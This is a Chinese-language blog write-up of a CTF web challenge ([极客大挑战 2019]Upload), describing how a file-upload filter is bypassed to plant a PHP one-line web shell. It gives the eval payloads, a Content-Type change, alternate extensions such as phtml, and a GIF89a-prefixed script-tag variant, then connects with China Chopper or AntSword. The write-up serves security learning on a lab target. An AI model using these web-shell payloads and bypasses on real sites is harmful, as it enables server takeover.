[极客大挑战 2019]Upload

题目打开是一个文件上次功能点

 

首次常规操作二话不说先上传一个一句话木马。

<?php @eval($_POST['123'])?>

页面提示被拦截,并显示not image

 

那我们进行抓包修改Content-Type字段进行绕过

 

 

 

发现php后缀被拦截,所以我们用畸形的后缀在进行绕过。

phtml、pht、php、php3、php4、php5

发现phtml可以正常绕过

 

 

 

发现<?被检测出来,进行拦截了,所以我们需要替换我们的一句话木马。

GIF89a? <script language="php">eval($_REQUEST[123])</script>  #替换之后的木马

然后就上次成功了

 

 

访问upload目录

http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/

 

 

然后用菜刀、蚁剑链接,链接地址

http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/shell.phtml

在根目录下找到flag

 

 

                                                                                                                                                            

 

 

posted @ 2021-08-30 14:04  随风kali  阅读(1313)  评论(0编辑  收藏  举报